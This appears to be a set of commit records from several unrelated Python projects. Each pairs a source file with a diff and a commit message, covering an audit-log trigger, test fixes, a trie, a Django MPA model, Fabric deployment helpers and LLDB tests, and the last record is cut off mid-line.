from datetime import datetime from sqlalchemy import event, DDL, Column, Integer, DateTime, String, text, Index from sqlalchemy.dialects import postgresql from sqlalchemy.orm import relationship from radar.database import db class Log(db.Model): __tablename__ = 'logs' id = Column(Integer, primary_key=True) date = Column(DateTime(timezone=True), nullable=False, default=datetime.utcnow, server_default=text('now()')) type = Column(String, nullable=False) user_id = Column(Integer) user = relationship('User', primaryjoin='User.id == Log.user_id', foreign_keys=[user_id]) data = Column(postgresql.JSONB) Index('logs_date_idx', Log.date) Index('logs_type_idx', Log.type) Index('logs_user_idx', Log.user_id) Index('logs_patient1_idx', Log.data['patient_id'].astext.cast(Integer), postgresql_where=Log.type == 'VIEW_PATIENT') Index('logs_patient2_idx', Log.data[('new_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'INSERT') Index('logs_patient3_idx', Log.data[('original_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'UPDATE') Index('logs_patient4_idx', Log.data[('new_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'UPDATE') Index('logs_patient5_idx', Log.data[('original_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'DELETE') Index('logs_table_name_idx', Log.data['table_name'].astext, postgresql_where=Log.type.in_(['INSERT', 'UPDATE', 'DELETE'])) def log_changes(cls): event.listen(cls.__table__, 'after_create', DDL(""" CREATE TRIGGER {0}_log_changes AFTER INSERT OR UPDATE OR DELETE ON {0} FOR EACH ROW EXECUTE PROCEDURE log_changes() """.format(cls.__tablename__))) return cls event.listen(db.Model.metadata, 'before_create', DDL(""" CREATE OR REPLACE FUNCTION log_changes() RETURNS TRIGGER AS $body$ DECLARE user_id INTEGER; BEGIN BEGIN user_id = current_setting('radar.user_id'); EXCEPTION WHEN OTHERS THEN user_id = NULL; END; IF (TG_OP = 'UPDATE') THEN INSERT INTO logs ( type, user_id, data ) VALUES ( 'UPDATE', user_id, json_build_object( 'table_name', TG_TABLE_NAME, 'original_data', row_to_json(OLD)::jsonb, 'new_data', row_to_json(NEW)::jsonb, 'query', current_query() )::jsonb ); RETURN NEW; ELSIF (TG_OP = 'DELETE') THEN INSERT INTO logs ( type, user_id, data ) VALUES ( 'DELETE', user_id, json_build_object( 'table_name', TG_TABLE_NAME, 'original_data', row_to_json(OLD)::jsonb, 'query', current_query() )::jsonb ); RETURN OLD; ELSIF (TG_OP = 'INSERT') THEN INSERT INTO logs ( type, user_id, data ) VALUES ( 'INSERT', user_id, json_build_object( 'table_name', TG_TABLE_NAME, 'new_data', row_to_json(NEW)::jsonb, 'query', current_query() )::jsonb ); RETURN NEW; ELSE RAISE WARNING '[log_action] Unknown action: %% at %%', TG_OP, now(); RETURN NULL; END IF; END; $body$ LANGUAGE plpgsql """)) event.listen(db.Model.metadata, 'after_drop', DDL(""" DROP FUNCTION IF EXISTS log_changes() """))
Python
0.000002
@@ -736,16 +736,119 @@ er_id)%0A%0A +Index('logs_user_date_idx', Log.user_id, Log.date)%0AIndex('logs_user_type_idx', Log.user_id, Log.type)%0A%0A Index('l
abb00ac993154071776488b5dcaef32cc2982f4c
Fix broken functional tests on windows
test/functional/master/test_endpoints.py
test/functional/master/test_endpoints.py
import os import yaml from test.framework.functional.base_functional_test_case import BaseFunctionalTestCase from test.functional.job_configs import BASIC_JOB class TestMasterEndpoints(BaseFunctionalTestCase): def _start_master_only_and_post_a_new_job(self): master = self.cluster.start_master() build_resp = master.post_new_build({ 'type': 'directory', 'config': yaml.safe_load(BASIC_JOB.config[os.name])['BasicJob'], 'project_directory': '/tmp', }) build_id = build_resp['build_id'] return master, build_id def test_cancel_build(self): master, build_id = self._start_master_only_and_post_a_new_job() master.cancel_build(build_id) master.block_until_build_finished(build_id) self.assert_build_has_canceled_status(build_id=build_id) def test_get_artifact_before_it_is_ready(self): master, build_id = self._start_master_only_and_post_a_new_job() # Since we didn't start any slaves so the artifacts is actually not ready. _, status_code = master.get_build_artifacts(build_id) self.assertEqual(status_code, 202) # Cancel the started build just to speed up teardown (avoid teardown timeout waiting for empty queue) master.cancel_build(build_id)
Python
0.000002
@@ -3,16 +3,33 @@ port os%0A +import tempfile%0A%0A import y @@ -32,16 +32,16 @@ rt yaml%0A - %0Afrom te @@ -224,16 +224,120 @@ Case):%0A%0A + def setUp(self):%0A super().setUp()%0A self._project_dir = tempfile.TemporaryDirectory()%0A%0A def @@ -618,14 +618,30 @@ y': -'/tmp' +self._project_dir.name ,%0A
b90d9ce7745aeef2d8d562d19a8cd6836b40eaa6
Fix handling partof closure in expand families
indra/tools/expand_families.py
indra/tools/expand_families.py
from __future__ import print_function, unicode_literals, absolute_import from builtins import dict, str import logging import itertools from copy import deepcopy from indra.preassembler.hierarchy_manager import HierarchyManager, \ hierarchies as default_hierarchies from indra.databases import hgnc_client from indra.statements import Agent, Complex, Evidence from indra.preassembler.grounding_mapper import GroundingMapper logger = logging.getLogger(__name__) class Expander(object): def __init__(self, hierarchies=None): if hierarchies is None: self.entities = default_hierarchies['entity'] else: self.entities = hierarchies['entity'] def expand_families(self, stmts): """Generate statements by expanding members of families and complexes. """ new_stmts = [] for stmt in stmts: # Put together the lists of families, with their members. E.g., # for a statement involving RAF and MEK, should return a list of # tuples like [(BRAF, RAF1, ARAF), (MAP2K1, MAP2K2)] families_list = [] for ag in stmt.agent_list(): ag_children = self.get_children(ag) # If the agent has no children, then we use the agent itself if len(ag_children) == 0: families_list.append([ag]) # Otherwise, we add the tuple of namespaces/IDs for the children else: families_list.append(ag_children) # Now, put together new statements frmo the cross product of the # expanded family members for ag_combo in itertools.product(*families_list): # Create new agents based on the namespaces/IDs, with # appropriate name and db_refs entries child_agents = [] for ag_entry in ag_combo: # If we got an agent, or None, that means there were no # children; so we use the original agent rather than # construct a new agent if ag_entry is None or isinstance(ag_entry, Agent): new_agent = ag_entry # Otherwise, create a new agent from the ns/ID elif isinstance(ag_entry, tuple): # FIXME FIXME FIXME # This doesn't reproduce agent state from the original # family-level statements! ag_ns, ag_id = ag_entry new_agent = _agent_from_ns_id(ag_ns, ag_id) else: raise Exception('Unrecognized agent entry type.') # Add agent to our list of child agents child_agents.append(new_agent) # Create a copy of the statement new_stmt = deepcopy(stmt) # Replace the agents in the statement with the newly-created # child agents new_stmt.set_agent_list(child_agents) # Add to list new_stmts.append(new_stmt) return new_stmts def get_children(self, agent, ns_filter='HGNC'): if agent is None: return [] # Get the grounding for the agent (ns, id) = agent.get_grounding() # If there is no grounding for this agent, then return no children # (empty list) if ns is None or id is None: return [] # Get URI for agent ag_uri = self.entities.get_uri(ns, id) # Look up the children for this family children_uris = self.entities.get_children(ag_uri) if not children_uris: return [] # Parse children URI list into namespaces and ID children_parsed = [] for child_uri in children_uris: child_ns, child_id = self.entities.ns_id_from_uri(child_uri) # If ns_filter is None, add in all children if ns_filter is None: children_parsed.append((child_ns, child_id)) # Otherwise, only add children with a matching namespace elif child_ns == ns_filter: children_parsed.append((child_ns, child_id)) return children_parsed def complexes_from_hierarchy(self): # Iterate over the partof_closure to determine all of the complexes # and all of their members all_complexes = {} for subunit, complexes in self.entities.partof_closure.items(): for complex in complexes: complex_subunits = all_complexes.get(complex, []) complex_subunits.append(subunit) all_complexes[complex] = complex_subunits # Now iterate over all of the complexes and create Complex statements complex_stmts = [] for complex, subunits in all_complexes.items(): # Create an Evidence object for the statement with the URI of the # complex as the source_id ev = Evidence(source_api='famplex', source_id=complex) subunit_agents = [_agent_from_uri(su) for su in subunits] complex_stmt = Complex(subunit_agents, evidence=[ev]) complex_stmts.append(complex_stmt) return complex_stmts def expanded_complexes_from_hierarchy(self): complex_stmts = self.complexes_from_hierarchy() expanded_complexes = self.expand_families(complex_stmts) return expanded_complexes def _agent_from_uri(uri): ag_ns, ag_id = HierarchyManager.ns_id_from_uri(uri) agent = _agent_from_ns_id(ag_ns, ag_id) return agent def _agent_from_ns_id(ag_ns, ag_id): # Add the ID as a placeholder name agent = Agent(ag_id) # If we have a proper grounding, add to db_refs if ag_id is not None: agent.db_refs[ag_ns] = ag_id # Now standardize db_refs and set standardized name GroundingMapper.standardize_agent_name(agent, standardize_refs=True) agent.db_refs['TEXT'] = agent.name return agent
Python
0
@@ -4521,18 +4521,16 @@ complex -es in self @@ -4557,60 +4557,10 @@ sure -.items() :%0A - for complex in complexes:%0A @@ -4621,36 +4621,32 @@ %5B%5D)%0A - complex_subunits @@ -4662,20 +4662,16 @@ ubunit)%0A -
bde7322df85371c67fefe7169c2b6efb5e7717f6
Update rasa/cli/arguments/test.py
rasa/cli/arguments/test.py
rasa/cli/arguments/test.py
import argparse from typing import Union from rasa.constants import DEFAULT_MODELS_PATH, DEFAULT_CONFIG_PATH from rasa.cli.arguments.default_arguments import ( add_stories_param, add_model_param, add_nlu_data_param, add_endpoint_param, ) from rasa.model import get_latest_model def set_test_arguments(parser: argparse.ArgumentParser): add_model_param(parser, add_positional_arg=False) core_arguments = parser.add_argument_group("Core Test Arguments") add_test_core_argument_group(core_arguments) nlu_arguments = parser.add_argument_group("NLU Test Arguments") add_test_nlu_argument_group(nlu_arguments) def set_test_core_arguments(parser: argparse.ArgumentParser): add_test_core_model_param(parser) add_test_core_argument_group(parser) def set_test_nlu_arguments(parser: argparse.ArgumentParser): add_model_param(parser, add_positional_arg=False) add_test_nlu_argument_group(parser) def add_test_core_argument_group( parser: Union[argparse.ArgumentParser, argparse._ActionsContainer] ): add_stories_param(parser, "test") parser.add_argument( "--max-stories", type=int, help="Maximum number of stories to test on." ) parser.add_argument( "--output", type=str, default="results", help="Output path for any files created during the evaluation.", ) parser.add_argument( "--e2e", "--end-to-end", action="store_true", help="Run an end-to-end evaluation for combined action and " "intent prediction. Requires a story file in end-to-end " "format.", ) add_endpoint_param(parser) parser.add_argument( "--fail-on-prediction-errors", action="store_true", help="If a prediction error is encountered, an exception " "is thrown. This can be used to validate stories during " "tests, e.g. on travis.", ) parser.add_argument( "--url", type=str, help="If supplied, downloads a story file from an URL and " "trains on it. Fetches the data by sending a GET request " "to the supplied URL.", ) def add_test_nlu_argument_group( parser: Union[argparse.ArgumentParser, argparse._ActionsContainer] ): add_nlu_data_param(parser) parser.add_argument( "--report", required=False, nargs="?", const="reports", default=None, help="Output path to save the intent/entity metrics report.", ) parser.add_argument( "--successes", required=False, nargs="?", const="successes.json", default=None, help="Output path to save successful predictions.", ) parser.add_argument( "--errors", required=False, default="errors.json", help="Output path to save model errors.", ) parser.add_argument( "--histogram", required=False, default="hist.png", help="Output path for the confidence histogram.", ) parser.add_argument( "--confmat", required=False, default="confmat.png", help="Output path for the confusion matrix plot.", ) cross_validation_arguments = parser.add_argument_group("Cross Validation") cross_validation_arguments.add_argument( "--cross-validation", action="store_true", default=False, help="Switch on cross validation mode. Any provided model will be ignored.", ) cross_validation_arguments.add_argument( "-c", "--config", type=str, default=DEFAULT_CONFIG_PATH, help="Model configuration file (cross validation only).", ) cross_validation_arguments.add_argument( "-f", "--folds", required=False, default=10, help="Number of cross validation folds (cross validation only).", ) def add_test_core_model_param(parser: argparse.ArgumentParser): default_path = get_latest_model(DEFAULT_MODELS_PATH) parser.add_argument( "-m", "--model", nargs="+", default=[default_path], help="Path to a pre-trained model. If it is a 'tar.gz' file that model file " "will be used. If it is a directory, the latest model in that directory " "will be used. If multiple 'tar.gz' files are provided, all those models " "will be compared.", )
Python
0
@@ -2034,17 +2034,16 @@ e from a -n URL and
2a243c893ac8a4ddadd98f6fbb4ef5628a6d7607
Support single-ended slices on Tries
dispatch/util/trie.py
dispatch/util/trie.py
from ..constructs import Instruction class Trie(object): BUCKET_LEN = 1 BUCKET_MASK = (2**BUCKET_LEN)-1 def __init__(self): self.children = [None for _ in range(2**Trie.BUCKET_LEN)] self.value = None def __setitem__(self, key, value): assert type(value) == Instruction node = self for bucket in [(key >> i) & Trie.BUCKET_MASK for \ i in range(64, -1, -Trie.BUCKET_LEN)]: if not node.children[bucket]: node.children[bucket] = Trie() node = node.children[bucket] node.value = value def __getitem__(self, item): if type(item) in (int, long): node = self for bucket in [(item >> i) & Trie.BUCKET_MASK for \ i in range(64, -1, -Trie.BUCKET_LEN)]: if not node.children[bucket]: raise KeyError() node = node.children[bucket] return node.value elif type(item) == slice: uncommon_bits = (item.stop ^ item.start).bit_length() node = self for bucket in [(item.start >> i) & Trie.BUCKET_MASK for \ i in range(64, uncommon_bits, -Trie.BUCKET_LEN)]: if not node.children[bucket]: raise KeyError() node = node.children[bucket] return [v for v in iter(node) if item.start <= v.address < item.stop][::item.step] def __iter__(self): if self.value: yield self.value for child in filter(None, self.children): for v in child: yield v def __contains__(self, item): node = self for bucket in [(item >> i) & Trie.BUCKET_MASK for \ i in range(64, -1, -Trie.BUCKET_LEN)]: if not node.children[bucket]: return False node = node.children[bucket] return True def __delitem__(self, key): node = self for bucket in [(key >> i) & Trie.BUCKET_MASK for \ i in range(64, -1, -Trie.BUCKET_LEN)]: if not node.children[bucket]: raise KeyError() node = node.children[bucket] if node.value: del node.value
Python
0
@@ -1024,16 +1024,283 @@ slice:%0A + start = item.start%0A stop = item.stop%0A if start is None:%0A start = 0%0A if stop is None:%0A # 128 bits max address. Seems big enough for practical purposes%0A stop = 0xFFFFFFFFFFFFFFFF%0A @@ -1324,25 +1324,15 @@ = ( -item. stop %5E -item. star @@ -1400,21 +1400,16 @@ et in %5B( -item. start %3E%3E @@ -1688,21 +1688,16 @@ ode) if -item. start %3C= @@ -1709,21 +1709,16 @@ dress %3C -item. stop%5D%5B::
3d878557a5e2d4f39474b1ca3df8af9012fd4303
Make the MpaDesignation optional for an MPA; Allows adding undesignated mpas.
lingcod/mpa/models.py
lingcod/mpa/models.py
from django.contrib.gis.db import models from django.contrib.auth.models import User, Group from django.conf import settings from lingcod.common.utils import LookAtKml from lingcod.manipulators.manipulators import * from django.contrib.contenttypes.models import ContentType from django.contrib.contenttypes import generic class MpaDesignation(models.Model): """Model used to represent the designation of the MPA ====================== ============================================== Attribute Description ====================== ============================================== ``name`` Designation of the MPA ``acronym`` The acronym for this MPA designation ``poly_outline_color`` Hex Color for rendering the outline/border ``poly_fill_color`` Hex Color for rendering the polygon area ====================== ============================================== """ name = models.TextField(verbose_name="Designation Name") acronym = models.CharField(max_length=10, unique=True, verbose_name="Designation Acronym") poly_outline_color = models.CharField(max_length=8, default="ffffffff", verbose_name="Hex Color for rendering outline/border") poly_fill_color = models.CharField(max_length=8, default="ff0000ff", verbose_name="Hex Color for rendering polygon area") url = models.URLField(verify_exists=False,verbose_name="URL to more info on this MPA Designation") def __unicode__(self): return "(%s) %s" % (self.acronym, self.name) class Mpa(models.Model): """Model used for representing marine protected areas or MPAs ====================== ============================================== Attribute Description ====================== ============================================== ``user`` Owner of the MPA ``name`` Name of the MPA ``date_created`` When the MPA was created. Is not changed on updates. ``date_modified`` When the MPA geometry was last updated. ``geometry_orig`` PolygonField representing the MPA boundary as originally drawn by the user ``geometry_final`` PolygonField representing the MPA boundary after postprocessing. ``content_type`` Content type of the associated Array (Generic One-to-Many) ``object_id`` pk of the specific array object ``array`` Use to access the associated Array (read-only) ====================== ============================================== """ user = models.ForeignKey(User) name = models.TextField(verbose_name="MPA Name") date_created = models.DateTimeField(auto_now_add=True, verbose_name="Date Created") date_modified = models.DateTimeField(auto_now=True, verbose_name="Date Modified") geometry_orig = models.PolygonField(srid=settings.GEOMETRY_DB_SRID, null=True, blank=True, verbose_name="Original MPA boundary") geometry_final = models.PolygonField(srid=settings.GEOMETRY_DB_SRID, null=True, blank=True, verbose_name="Final MPA boundary") # Array relation fields content_type = models.ForeignKey(ContentType, blank=True, null=True) object_id = models.PositiveIntegerField(blank=True,null=True) array = generic.GenericForeignKey('content_type', 'object_id') designation = models.ForeignKey(MpaDesignation) objects = models.GeoManager() class Meta: abstract=True class Options: manipulators = [ ClipToStudyRegionManipulator ] def __unicode__(self): return self.name def geom_as_kml(self): """ returns the final geometry as a kml geometry string projected into wgs84 """ wgs84_geom = self.geometry_final.transform(4326, clone=True) return wgs84_geom.kml def lookAtKml(self): """ Get the kml for a camera perspective looking at the MPA's final geometry """ return LookAtKml( self.geometry_final ) def kmlOrigGeom(self, style_domain): self.geometry_orig.transform(4326) return '<Placemark>' + '<name>' + self.name + ' original geometry</name>' + self.kmlOrigGeomStyle(style_domain) + LookAtKml( self.geometry_orig ) + self.geometry_orig.kml + '</Placemark>' def kmlFinalGeom(self, style_domain): self.geometry_final.transform(4326) return '<Placemark>' + '<name>' + self.name + ' final geometry</name>' + self.kmlFinalGeomStyle(style_domain) + LookAtKml( self.geometry_final ) + self.geometry_final.kml + '</Placemark>' def kmlOrigGeomStyle(self, style_domain): return '<Style> <LineStyle> <color>ffffffff</color> <width>2</width> </LineStyle> <PolyStyle> <color>80ffffff</color> </PolyStyle></Style>' def kmlFinalGeomStyle(self, style_domain): return '<Style> <LineStyle> <color>ffffffff</color> <width>2</width> </LineStyle> <PolyStyle> <color>80ff0000</color> </PolyStyle></Style>' def kmlFolder(self, style_domain): """ Return a kml folder containing the kml for this mpa's final and orginal geometry """ return '<Document><name>MPAs</name><Folder>' + '<name>' + self.name + '</name>' + self.kmlFinalGeom(style_domain) + self.kmlOrigGeom(style_domain) + '</Folder></Document>' def add_to_array(self, array): """Adds the MPA to the specified array.""" self.array = array self.save() def remove_from_array(self): """Sets the MPA's `array` property to None.""" self.array = None self.save()
Python
0.000006
@@ -3725,16 +3725,39 @@ ignation +, blank=True, null=True )%0A%0A o
8d4c7c94dba6708758732d74228e1337bd9f0b83
raise version number
yam/__init__.py
yam/__init__.py
__version__ = '0.2.1' from yam.main import run from yam.commands import read_dicts
Python
0.000006
@@ -16,9 +16,13 @@ 0.2. -1 +2-dev '%0A%0Af
ce6a23206271f4e9a0dfd54e7a2663789d5237de
update test
accelerator_abstract/tests/test_startup_progress.py
accelerator_abstract/tests/test_startup_progress.py
from django.test import TestCase from accelerator.tests.factories import ( BusinessPropositionFactory, StartupFactory ) from accelerator.models import BusinessProposition from accelerator_abstract.models.base_startup import ( APPLICATION_READY, PROFILE_COMPLETE, ) from accelerator_abstract.models import EXCLUDED_FIELDS class TestStartupProgress(TestCase): def _business_proposition_data(self): fields = BusinessProposition._meta.get_fields(include_parents=False) characters = 'text input characters' data = {} for field in fields: if field.name not in EXCLUDED_FIELDS: data[field.name] = characters return data def test_application_ready_milestone_with_incomplete_data(self): startup = StartupFactory() BusinessPropositionFactory(startup=startup) progress = startup.profile_status() self.assertEqual(progress['milestone'], APPLICATION_READY) self.assertFalse(progress['bus-prop-complete']) self.assertFalse(progress['profile-complete']) self.assertGreater(1, progress['progress']) def test_business_prop_complete_startup_profile_incomplete(self): startup = StartupFactory() business_prop_data = self._business_proposition_data() BusinessPropositionFactory(startup=startup, **business_prop_data) progress = startup.profile_status() self.assertEqual(progress['milestone'], APPLICATION_READY) self.assertTrue(progress['bus-prop-complete']) self.assertFalse(progress['profile-complete']) self.assertGreater(1, progress['progress']) def test_startup_profile_complete_business_prop_incomplete_(self): startup = StartupFactory(video_elevator_pitch_url='https://video.com') BusinessPropositionFactory(startup=startup) progress = startup.profile_status() self.assertEqual(progress['milestone'], APPLICATION_READY) self.assertFalse(progress['bus-prop-complete']) self.assertTrue(progress['profile-complete']) self.assertGreater(1, progress['progress']) def test_milestone_change_when_required_field_complete(self): business_proposition_data = self._business_proposition_data() startup = StartupFactory(video_elevator_pitch_url='https://video.com') BusinessPropositionFactory(startup=startup, **business_proposition_data) progress = startup.profile_status() self.assertEqual(progress['milestone'], PROFILE_COMPLETE) self.assertTrue(progress['bus-prop-complete']) self.assertFalse(progress['profile-complete']) self.assertGreater(1, progress['progress']) def test_business_prop_complete_startup_profile_complete(self): business_proposition_data = self._business_proposition_data() startup = StartupFactory(video_elevator_pitch_url='https://video.com', high_resolution_logo='logo.jpg') BusinessPropositionFactory(startup=startup, **business_proposition_data) progress = startup.profile_status() self.assertEqual(progress['milestone'], PROFILE_COMPLETE) self.assertTrue(progress['bus-prop-complete']) self.assertTrue(progress['profile-complete']) self.assertEqual(1, progress['progress'])
Python
0
@@ -1658,31 +1658,41 @@ ef test_ -startup_profile +profile_application_field _complet @@ -1717,17 +1717,16 @@ complete -_ (self):%0A @@ -1948,33 +1948,32 @@ tone'%5D, -APPLICATION_READY +PROFILE_COMPLETE )%0A @@ -2033,35 +2033,36 @@ self.assert -Tru +Fals e(progress%5B'prof
3ea84302368818133b045d56a0c8c798872eedd1
Add default logger and log exception
influxdb_metrics/middleware.py
influxdb_metrics/middleware.py
"""Middlewares for the influxdb_metrics app.""" from django import VERSION as DJANGO_VERSION import inspect import time try: from urllib import parse except ImportError: import urlparse as parse from django.conf import settings try: from django.utils.deprecation import MiddlewareMixin except ImportError: class MiddlewareMixin(object): pass from tld import get_tld from tld.exceptions import TldBadUrl, TldDomainNotFound, TldIOError from .loader import write_points if DJANGO_VERSION < (1, 10): def is_user_authenticated(user): return user.is_authenticated() else: def is_user_authenticated(user): return user.is_authenticated class InfluxDBRequestMiddleware(MiddlewareMixin): """ Measures request time and sends metric to InfluxDB. Credits go to: https://github.com/andymckay/django-statsd/blob/master/django_statsd/middleware.py#L24 # NOQA """ def process_view(self, request, view_func, view_args, view_kwargs): view = view_func if not inspect.isfunction(view_func): view = view.__class__ try: request._view_module = view.__module__ request._view_name = view.__name__ request._start_time = time.time() except AttributeError: # pragma: no cover pass def process_response(self, request, response): self._record_time(request) return response def process_exception(self, request, exception): self._record_time(request) def _record_time(self, request): if hasattr(request, '_start_time'): ms = int((time.time() - request._start_time) * 1000) if request.is_ajax(): is_ajax = True else: is_ajax = False is_authenticated = False is_staff = False is_superuser = False if is_user_authenticated(request.user): is_authenticated = True if request.user.is_staff: is_staff = True if request.user.is_superuser: is_superuser = True referer = request.META.get('HTTP_REFERER') referer_tld = None referer_tld_string = '' if referer: try: referer_tld = get_tld(referer, as_object=True) except (TldBadUrl, TldDomainNotFound, TldIOError): pass if referer_tld: referer_tld_string = referer_tld.tld url = request.get_full_path() url_query = parse.parse_qs(parse.urlparse(url).query) # This allows you to measure click rates for ad-campaigns, just # make sure that your ads have `?campaign=something` in the URL campaign_keyword = getattr( settings, 'INFLUXDB_METRICS_CAMPAIGN_KEYWORD', 'campaign') campaign = '' if campaign_keyword in url_query: campaign = url_query[campaign_keyword][0] data = [{ 'measurement': 'django_request', 'tags': { 'host': settings.INFLUXDB_TAGS_HOST, 'is_ajax': is_ajax, 'is_authenticated': is_authenticated, 'is_staff': is_staff, 'is_superuser': is_superuser, 'method': request.method, 'module': request._view_module, 'view': request._view_name, 'referer': referer, 'referer_tld': referer_tld_string, 'full_path': url, 'path': request.path, 'campaign': campaign, }, 'fields': {'value': ms, }, }] try: write_points(data) except Exception as err: pass # sadly, when using celery, there can be issues with the connection to the MQ. Better to drop the data # than fail the request.
Python
0
@@ -114,16 +114,31 @@ rt time%0A +import logging%0A try:%0A @@ -690,16 +690,54 @@ icated%0A%0A +logger = logging.getLogger(__name__)%0A%0A %0Aclass I @@ -3992,20 +3992,80 @@ -pass +logger.exception(err, extra=%7B%22request%22: request%7D)%0A # sadl
5aa1ebc3ab10eb2bce9410d4997944a411a4bac4
Make the test case SourceManagerTestCase.display_source_python stronger by also matching the source line number displayed.
test/source-manager/TestSourceManager.py
test/source-manager/TestSourceManager.py
""" Test lldb core component: SourceManager. Test cases: o test_display_source_python: Test display of source using the SBSourceManager API. o test_modify_source_file_while_debugging: Test the caching mechanism of the source manager. """ import unittest2 import lldb from lldbtest import * class SourceManagerTestCase(TestBase): mydir = "source-manager" def setUp(self): # Call super's setUp(). TestBase.setUp(self) # Find the line number to break inside main(). self.line = line_number('main.c', '// Set break point at this line.') @python_api_test def test_display_source_python(self): """Test display of source using the SBSourceManager API.""" self.buildDefault() self.display_source_python() def test_modify_source_file_while_debugging(self): """Modify a source file while debugging the executable.""" self.buildDefault() self.modify_source_file_while_debugging() def display_source_python(self): """Display source using the SBSourceManager API.""" exe = os.path.join(os.getcwd(), "a.out") self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET) target = self.dbg.CreateTarget(exe) self.assertTrue(target.IsValid(), VALID_TARGET) # Launch the process, and do not stop at the entry point. process = target.LaunchProcess([], [], os.ctermid(), 0, False) # # Exercise Python APIs to display source lines. # # Create the filespec for 'main.c'. filespec = lldb.SBFileSpec('main.c', False) source_mgr = self.dbg.GetSourceManager() # Use a string stream as the destination. stream = lldb.SBStream() source_mgr.DisplaySourceLinesWithLineNumbers(filespec, self.line, 2, # context before 2, # context after "=>", # prefix for current line stream) # 2 # 3 int main(int argc, char const *argv[]) { # 4 => printf("Hello world.\n"); // Set break point at this line. # 5 return 0; # 6 } self.expect(stream.GetData(), "Source code displayed correctly", exe=False, patterns = ['=>.*Hello world']) def modify_source_file_while_debugging(self): """Modify a source file while debugging the executable.""" exe = os.path.join(os.getcwd(), "a.out") self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET) self.expect("breakpoint set -f main.c -l %d" % self.line, BREAKPOINT_CREATED, startstr = "Breakpoint created: 1: file ='main.c', line = %d, locations = 1" % self.line) self.runCmd("run", RUN_SUCCEEDED) # The stop reason of the thread should be breakpoint. self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT, substrs = ['state is stopped', 'main.c', 'stop reason = breakpoint']) # Display some source code. self.expect("list -f main.c -l %d" % self.line, SOURCE_DISPLAYED_CORRECTLY, substrs = ['Hello world']) # Read the main.c file content. with open('main.c', 'r') as f: original_content = f.read() print "original content:", original_content # Modify the in-memory copy of the original source code. new_content = original_content.replace('Hello world', 'Hello lldb', 1) # This is the function to restore the original content. def restore_file(): with open('main.c', 'w') as f: f.write(original_content) with open('main.c', 'r') as f: print "content restored to:", f.read() # Modify the source code file. with open('main.c', 'w') as f: f.write(new_content) print "new content:", new_content # Add teardown hook to restore the file to the original content. self.addTearDownHook(restore_file) # Display the source code again. We should see the updated line. self.expect("list -f main.c -l %d" % self.line, SOURCE_DISPLAYED_CORRECTLY, substrs = ['Hello lldb']) if __name__ == '__main__': import atexit lldb.SBDebugger.Initialize() atexit.register(lambda: lldb.SBDebugger.Terminate()) unittest2.main()
Python
0.999996
@@ -2469,16 +2469,19 @@ rns = %5B' +%25d =%3E.*Hell @@ -2488,16 +2488,28 @@ o world' + %25 self.line %5D)
71d0f02e1274829a302cdd6f716f2fc0680cce49
Update fab.py
ydcommon/fab.py
ydcommon/fab.py
from fabric.api import local, sudo, run from fabric.operations import prompt from fabric.colors import red from fabric.contrib.console import confirm def get_branch_name(on_local=True): cmd = "git branch --no-color 2> /dev/null | sed -e '/^[^*]/d'" if on_local: name = local(cmd, capture=True).replace("* ", "") else: name = run(cmd) return name.replace("* ", "").strip() def switch(stage): """ Switch to given stage (dev/qa/production) + pull """ stage = stage.lower() local("git pull") if stage in ['dev', 'devel', 'develop']: branch_name = 'develop' elif stage in ['qa', 'release']: branches = local('git branch -r', capture=True) possible_branches = [] for b in branches.split("\n"): b_parts = b.split('/') if b_parts[1] == 'release': possible_branches.append(b_parts[2]) if len(possible_branches) == 0: raise Exception('No release branches found. Please create a new release first.') possible_branches = sorted(possible_branches, reverse=True) branch_name = 'release/%s' % possible_branches[0] elif stage in ['production', 'master']: branch_name = 'master' else: raise NotImplemented local("git checkout %s" % branch_name) local("git pull") def release_qa(): """ Release code to QA server """ name = prompt(red('Sprint name?'), default='Sprint 1').lower().replace(' ', "_") date = prompt(red('Sprint start date (Y-m-d)?'), default='2013-01-20').replace('-', '') release_name = '%s_%s' % (date, name) local('git flow release start %s' % release_name) local('git flow release publish %s' % release_name) print red('PLEASE DEPLOY CODE: fab deploy:all') def update_qa(): """ Merge code from develop to qa """ switch('dev') switch('qa') local('git merge --no-edit develop') local('git push') print red('PLEASE DEPLOY CODE: fab deploy:all') def check_branch(environment, user): if environment == 'qa': local_branch = get_branch_name() remote_branch = get_branch_name(False) if local_branch != remote_branch: change = confirm(red('Branch on server is different, do you want to replace your local branch with server version?'), default=True) if change: sudo('git checkout %s' % local_branch, user=user)
Python
0
@@ -2302,55 +2302,37 @@ to -replace your +checkout %25s ?' %25 local - +_ branch - with server version?' ), d
95aa4c210c735bd9ac74a65cdbef418d99beb319
Bump to v0.2.0
sii/__init__.py
sii/__init__.py
# -*- coding: utf-8 -*- __LIBRARY_VERSION__ = '0.1.0alpha' __SII_VERSION__ = '0.7'
Python
0.000001
@@ -47,16 +47,11 @@ '0. -1 +2 .0 -alpha '%0A__
bf71ea3e0f84d0e8317429e41b45dfe2e157d8a9
fix import
test/unit_test/test_general_functions.py
test/unit_test/test_general_functions.py
from lexos.helpers.general_functions import get_encoding, make_preview_from, \ generate_d3_object, merge_list, load_stastic, matrix_to_dict, \ dict_to_matrix, html_escape, apply_function_exclude_tags, decode_bytes from test.helpers.file_path import CHINESE_ENCODING_TEST_FILE class TestGeneralFunctions: def test_get_encoding(self): assert get_encoding(b"asdf") == "ascii" def test_make_preview_from(self): newline = '\n' one_char = "x" less_than_500_char = "modgaecq" str_250 = "gjzeqagitanbwnuwjkfbtpixhkcxltlcmvrbunoxovjzhyoiptckkxmd" \ "brcnshyefsrqexbdeczdbqjvprgiyjwwsacutlahuwhmscyuwkqxfnxq" \ "zxyozedtwmrztwzzvoxrjnaypzbrkxfytpqeqmemxylvrvgtsthbalai" \ "byzxnoxxbtofhnpdepatvbihjoungenjidckhepgdlsmnrbqdgaalidw" \ "gccbardglcnedcqqxduuaauzyv" str_500 = str_250 + str_250 more_than_500_char_even = \ str_250 + less_than_500_char + less_than_500_char + str_250 more_than_500_char_odd = \ str_250 + less_than_500_char + one_char + less_than_500_char + \ str_250 middle = '\u2026 ' + newline + newline + '\u2026' assert make_preview_from(less_than_500_char) == less_than_500_char assert make_preview_from(str_500) == str_500 assert make_preview_from( 